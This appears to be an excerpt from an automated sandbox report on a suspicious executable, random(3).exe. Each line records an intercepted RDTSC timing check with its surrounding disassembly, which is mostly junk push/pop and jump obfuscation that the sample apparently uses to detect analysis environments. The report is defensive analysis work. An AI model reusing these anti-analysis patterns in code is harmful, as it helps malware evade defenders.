      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A88766 second address: A8879C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F998484EB18h 0x00000009 pop ebx 0x0000000a jmp 00007F998484EB19h 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A8879C second address: A887A1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A888C8 second address: A888CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A88AAC second address: A88AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A88AB0 second address: A88ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A898BE second address: A898C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A898C2 second address: A898C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A898C6 second address: A898CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A9010E second address: A90114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A9B0FF second address: A9B10C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F9984B08D06h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A9DB72 second address: A9DB89 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F998484EB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 je 00007F998484EB06h 0x00000016 popad 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A9DB89 second address: A9DB8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A9DB8E second address: A9DBBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F998484EB06h 0x0000000a jmp 00007F998484EB13h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F998484EB0Ch 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AA86D7 second address: AA86DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AAD22C second address: AAD248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F998484EB06h 0x0000000e jmp 00007F998484EB0Eh 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AAD248 second address: AAD270 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F9984B08D19h 0x0000000c pushad 0x0000000d jg 00007F9984B08D06h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AAD098 second address: AAD0A2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F998484EB06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AAD0A2 second address: AAD0A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AAD0A8 second address: AAD0D8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F998484EB0Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jne 00007F998484EB06h 0x00000010 pushad 0x00000011 jmp 00007F998484EB11h 0x00000016 jmp 00007F998484EB0Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AB187A second address: AB1880 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AB1880 second address: AB18A4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F998484EB1Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AB18A4 second address: AB18A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AB18A8 second address: AB18AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ABAF33 second address: ABAF3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ABAF3E second address: ABAF88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F998484EB14h 0x0000000e push eax 0x0000000f jmp 00007F998484EB14h 0x00000014 pop eax 0x00000015 popad 0x00000016 push ebx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ABAF88 second address: ABAF8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AB9A75 second address: AB9A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AB9A7A second address: AB9A81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AB9D24 second address: AB9D28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AB9D28 second address: AB9D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9984B08D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edi 0x0000000e jns 00007F9984B08D0Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F9984B08D10h 0x0000001b jmp 00007F9984B08D0Fh 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ABC614 second address: ABC632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F998484EB19h 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ABC632 second address: ABC642 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9984B08D12h 0x00000008 jl 00007F9984B08D06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ACCC8D second address: ACCC99 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F998484EB06h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ACE3FF second address: ACE404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ACE404 second address: ACE40A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AD2317 second address: AD2327 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9984B08D0Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ADF5A7 second address: ADF5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F998484EB06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ADF5B3 second address: ADF5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9984B08D11h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ADF5CF second address: ADF5FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F998484EB0Bh 0x0000000c jmp 00007F998484EB17h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ADF162 second address: ADF183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9984B08D10h 0x00000009 pop edi 0x0000000a jng 00007F9984B08D08h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: ADF183 second address: ADF189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AF5F21 second address: AF5F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AF607C second address: AF6080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AF6080 second address: AF609C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9984B08D06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F9984B08D0Ah 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AF609C second address: AF60D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB16h 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F998484EB17h 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AF6225 second address: AF622B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AF650D second address: AF6523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F998484EB12h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AF67ED second address: AF67F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AF6943 second address: AF6961 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F998484EB15h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AFAE79 second address: AFAE83 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9984B08D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AFAE83 second address: AFAE9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F998484EB17h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AFB188 second address: AFB18C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AFB18C second address: AFB190 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AFB288 second address: AFB28C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AFB28C second address: AFB2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jnp 00007F998484EB0Bh 0x0000000f adc dx, 7244h 0x00000014 push 00000004h 0x00000016 sub dword ptr [ebp+122D2F31h], ecx 0x0000001c and dx, 7F39h 0x00000021 call 00007F998484EB09h 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F998484EB0Ah 0x0000002d rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AFB2C2 second address: AFB2D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9984B08D11h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AFB2D7 second address: AFB305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f jmp 00007F998484EB0Eh 0x00000014 pop ecx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AFB305 second address: AFB326 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F9984B08D0Fh 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AFD08E second address: AFD09E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F998484EB06h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AFCBE9 second address: AFCBFB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9984B08D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F9984B08D1Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AFEBEE second address: AFEBF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AFEBF2 second address: AFEBF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AFEBF8 second address: AFEC17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB19h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: AFEC17 second address: AFEC1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0E2B6 second address: A0E2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0E2BA second address: A0E2BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0E2BE second address: A0E2C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0E2C4 second address: A0E2CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F9984B08D06h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0E2CE second address: A0E2D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0E2D2 second address: A0E2E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F9984B08D08h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49F07DE second address: 49F08AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, AEF2h 0x00000007 mov dh, C8h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F998484EB12h 0x00000013 xchg eax, ecx 0x00000014 pushad 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F998484EB0Ch 0x0000001c add esi, 699CBD38h 0x00000022 jmp 00007F998484EB0Bh 0x00000027 popfd 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b pushfd 0x0000002c jmp 00007F998484EB16h 0x00000031 and eax, 42FF3798h 0x00000037 jmp 00007F998484EB0Bh 0x0000003c popfd 0x0000003d popad 0x0000003e push eax 0x0000003f jmp 00007F998484EB19h 0x00000044 xchg eax, ecx 0x00000045 pushad 0x00000046 mov si, B4D3h 0x0000004a pushfd 0x0000004b jmp 00007F998484EB18h 0x00000050 sbb ch, 00000058h 0x00000053 jmp 00007F998484EB0Bh 0x00000058 popfd 0x00000059 popad 0x0000005a xchg eax, esi 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F998484EB15h 0x00000062 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49F08AE second address: 49F08DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 11CAED82h 0x00000008 jmp 00007F9984B08D13h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F9984B08D0Bh 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49F08DC second address: 49F08F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49F08F9 second address: 49F0909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9984B08D0Ch 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49F0909 second address: 49F090D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49F090D second address: 49F0935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov ebx, 38C59EC0h 0x0000000f mov di, E6ECh 0x00000013 popad 0x00000014 lea eax, dword ptr [ebp-04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F9984B08D0Dh 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49F0935 second address: 49F094A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49F094A second address: 49F0950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49F0950 second address: 49F0954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49F0954 second address: 49F096A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9984B08D0Bh 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49F0AC5 second address: 49F0AC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49F0AC9 second address: 49F0ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49F0ACF second address: 49F0AFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F998484EB10h 0x00000008 push esi 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d leave 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F998484EB13h 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49F0AFD second address: 49E0016 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 xor ebx, ebx 0x00000015 test al, 01h 0x00000017 jne 00007F9984B08D07h 0x00000019 sub esp, 04h 0x0000001c mov dword ptr [esp], 0000000Dh 0x00000023 call 00007F9988CB81C7h 0x00000028 mov edi, edi 0x0000002a jmp 00007F9984B08D0Eh 0x0000002f xchg eax, ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E0016 second address: 49E001B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E001B second address: 49E002A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9984B08D0Bh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E0187 second address: 49E0193 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 mov cx, di 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E0193 second address: 49E022C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F9984B08D0Fh 0x00000008 sbb ah, 0000000Eh 0x0000000b jmp 00007F9984B08D19h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 sub edi, edi 0x00000016 jmp 00007F9984B08D17h 0x0000001b inc ebx 0x0000001c jmp 00007F9984B08D16h 0x00000021 test al, al 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F9984B08D19h 0x0000002c xor si, B406h 0x00000031 jmp 00007F9984B08D11h 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E022C second address: 49E0232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E0232 second address: 49E0259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F9984B08F8Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ax, bx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E0259 second address: 49E025E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E025E second address: 49E027B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9984B08D19h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E027B second address: 49E027F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E027F second address: 49E02A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea ecx, dword ptr [ebp-14h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9984B08D18h 0x00000012 rdtsc
